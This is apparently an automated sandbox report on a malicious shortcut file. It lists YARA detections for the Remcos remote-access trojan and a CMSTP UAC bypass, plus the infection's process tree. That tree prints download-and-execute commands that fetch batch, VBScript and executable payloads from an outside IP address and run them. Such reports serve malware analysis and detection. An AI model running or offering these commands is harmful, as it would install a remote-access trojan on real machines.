Source: 24.2.cmd.exe.581ca8a.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.DZIPR.exe.362b5ce.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 30.2.explorer.exe.4ee7a8a.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.cmd.exe.4f4a757.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.cmd.exe.4f04a8a.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.cmd.exe.4f49b57.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 30.2.explorer.exe.4f2cb57.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.49d1a8a.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 30.2.explorer.exe.4f2d757.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.explorer.exe.4daca8a.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.4a17757.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.4a16b57.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.explorer.exe.4e3aa8a.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.explorer.exe.4df2757.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.explorer.exe.4df1b57.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.DZIPR.exe.35e5901.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: classification engine Classification label: mal100.troj.expl.evad.winLNK@44/34@0/2
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree, 16_2_00407776
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_0040118A GetDiskFreeSpaceExW,SendMessageW, 16_2_0040118A
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z, 16_2_004034C1
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress, 16_2_00401BDF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\hello.bat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:364:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1052:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdnnkvff.gsl.ps1 Jump to behavior
Source: Yara match File source: 17.0.DZIPR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000000.2322852163.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2318798588.00000000027E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\DZIPR.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, type: DROPPED
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: Dlr7HYI6VL.lnk ReversingLabs: Detection: 15%
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exe
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"
Source: C:\Users\user\DZIPR.exe Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
